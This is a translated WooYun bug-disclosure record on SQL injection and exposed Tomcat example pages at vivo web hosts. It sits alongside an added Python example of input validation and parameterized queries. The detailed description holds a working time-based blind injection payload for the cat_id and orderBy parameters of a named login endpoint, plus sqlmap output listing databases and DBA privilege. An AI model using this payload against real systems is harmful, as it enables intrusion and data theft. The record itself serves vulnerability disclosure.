
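Vulnerability summary

Bug ID: wooyun-2015-0119872

Title: BBK (步步高) Mall SQL injection + back-end system misconfiguration (DBA privileges expose a large amount of database information)

Vendor: vivo smartphones

Author: 人丑嘴不甜

Submitted: 2015-06-12 15:01

Fixed: 2015-07-31 20:02

Publicly disclosed: 2015-07-31 20:02

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]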

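Vulnerability details

Disclosure status:

2015-06-12: Details reported to the vendor, awaiting vendor response
2015-06-16: Vendor confirmed; details disclosed to the vendor only
2015-06-26: Details disclosed to core white hats and experts in related fields
2015-07-06: Details disclosed to regular white hats
2015-07-16: Details disclosed to trainee white hats
2015-07-31: Details disclosed to the public

Brief description:

Back-end system misconfiguration and time-based blind injection with DBA privileges; almost everything could be enumerated

Detailed description:

Back-end system misconfiguration
http://supply.vivo.com.cn/examples/servlets/servlet/SessionExample;jsessionid=C44A64DEDD77CF24847E5919542A2DCE
/examples/servlets/servlet/SessionExample
Apache Tomcat version older than 6.0.36
The version is too old
http://pop.vivo.com.cn/examples/servlets/servlet/SessionExample
pop.vivo.com.cn/loginOn.action
Injection point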

Place: POST
Parameter: cat_id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cat_id=22) AND SLEEP(5) AND (6138=6138&orderBy=1,(select case when
(3*2*1=6 AND 000144=000144) then 1 else 1*(select table_name from
information_schema.tables)end)=1&showtype=list&&virtual_cat_id=
---
[10:59:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.25
back-end DBMS: MySQL 5.0.11
current database: 'vivo_swore'
Database: vivo_swore
[84 tables]
web application technology: Nginx, PHP 5.3.25
back-end DBMS: MySQL 5.0.11
[20:55:20] [INFO] fetching tables for database: 'vivo0307'
[20:55:20] [INFO] fetching number of tables for database 'vivo0307'
[20:55:20] [INFO] resumed: 171

Proof of vulnerability:

QQ图片20150604131816.png

QQ图片20150604131841.png

QQ图片20150604131816.png

11.png

QQ图片20150611151047.png

QQ图片20150611205356.png


Checking privileges: DBA

QQ图片20150611211118.png

Remediation:

Thanks for your hard work
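
An added example, not part of the original report or of the vendor's code: the sqlmap payload above carries injected SQL in both `cat_id` and `orderBy`, so this handler validates both before building a parameterized query. Python with an in-memory SQLite database stands in for the site's PHP/MySQL stack; the `goods` table, its columns and the sort-key whitelist are assumptions.

```python
import re
import sqlite3

# Assumed sort keys: the report does not show which columns the site sorts by.
ORDER_COLUMNS = {"1": "goods_id", "2": "price", "3": "name"}

def build_goods_query(params):
    """Return (sql, args) for a category listing, or raise ValueError."""
    cat_id = params.get("cat_id", "")
    # cat_id is a numeric key: accept ASCII digits only, so a value such as
    # "22) AND SLEEP(5) AND (6138=6138" never reaches the SQL layer.
    if not re.fullmatch(r"[0-9]{1,9}", cat_id):
        raise ValueError("cat_id must be a decimal integer")
    # ORDER BY targets cannot be bound as parameters, so the client value is
    # only used as a lookup key into a fixed set of column names.
    order_key = params.get("orderBy", "1")
    if order_key not in ORDER_COLUMNS:
        raise ValueError("orderBy is not an allowed sort key")
    sql = ("SELECT goods_id, name, price FROM goods "
           "WHERE cat_id = ? ORDER BY " + ORDER_COLUMNS[order_key])
    return sql, (int(cat_id),)

def make_demo_db():
    """Constructed sample data; table and column names are hypothetical."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE goods (goods_id INTEGER, cat_id INTEGER, "
                 "name TEXT, price REAL)")
    conn.executemany("INSERT INTO goods VALUES (?, ?, ?, ?)",
                     [(1, 22, "b", 20.0), (2, 22, "a", 10.0), (3, 7, "c", 5.0)])
    return conn

def handle_request(conn, params):
    """Run the listing, or report why the request was refused."""
    try:
        sql, args = build_goods_query(params)
    except ValueError as exc:
        return "rejected: " + str(exc)
    return conn.execute(sql, args).fetchall()

if __name__ == "__main__":
    db = make_demo_db()
    print(handle_request(db, {"cat_id": "22", "orderBy": "2"}))
    # Values taken from the sqlmap payload in this report.
    print(handle_request(db, {"cat_id": "22) AND SLEEP(5) AND (6138=6138"}))
    print(handle_request(db, {"cat_id": "22", "orderBy": "1,(select case when"}))
```

The database account behind such a query should also hold only the privileges the listing needs, since the report shows the injected session running with DBA rights.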

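Copyright notice: please credit the source when reposting: 人丑嘴不甜@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-06-16 20:01

Vendor reply:

Thank you for the notice and your attention

Latest status:

None


Vulnerability evaluation:

Comments

  1. 2015-06-16 20:58 | 人丑嘴不甜 ( Passerby | Rank: 28, Vulnerabilities: 8 | A little newbie dreaming of becoming a great expert)

    Why is it still so little? Is this still a small vendor? Only 4 rank for me???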